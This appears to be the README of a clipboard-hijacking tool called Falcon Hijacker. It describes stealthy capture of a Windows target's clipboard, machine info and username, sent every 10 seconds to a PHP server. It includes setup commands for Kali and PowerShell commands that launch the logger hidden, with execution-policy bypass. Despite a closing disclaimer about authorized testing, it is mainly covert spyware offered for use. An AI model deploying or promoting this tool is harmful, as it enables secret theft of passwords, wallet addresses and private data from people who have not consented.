Falcon Hijacker is a professional clipboard monitoring tool designed for authorized security assessments. It captures real-time clipboard data from target systems through a streamlined bash interface.
- Kali Linux
- Parrot Sec OS
Termux(Not tested)
- Live Data Stream: Real-time clipboard viewing
- Structured Logging: Timestamped entries with metadata
- Export Ready: Clean log format for analysis
- Frequency: Checks clipboard every 10 seconds
- Data Sent: Clipboard content + machine info + username
- Stealth: No visible window, error suppression
- Persistence: Runs until manually stopped
This tool require PHP for webserver, and wget for downloading dependencies. First run following command on your terminal
apt-get -y install php wget
git clone https://github.com/rgsecteam/falcon-hijacker
cd falcon-hijacker
bash falcon.sh
Run the following command on windows matchin.
powershell -NoP -NonI -W h -Exec Bypass .\clipboard_logger.ps1
For Hidden Execution
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File .\clipboard_logger.ps1" -WindowStyle Hidden
Stop Hidden Execution
For Stop Powershell Background Process.
Stop-Process -Name powershell -Force
By using the materials in this repository you agree to:
- Use the information only for defensive, educational, or research purposes in controlled environments.
- Follow all applicable laws and organizational policies.
- Do not use this repository to harm others. Always obtain explicit permission before testing on systems you do not own.
For More Video subcribe RGSecurityTeam YouTube Channel
Falcon-hijacker is inspired by https://github.com/techchipnet/
Big thanks to @techchipnet
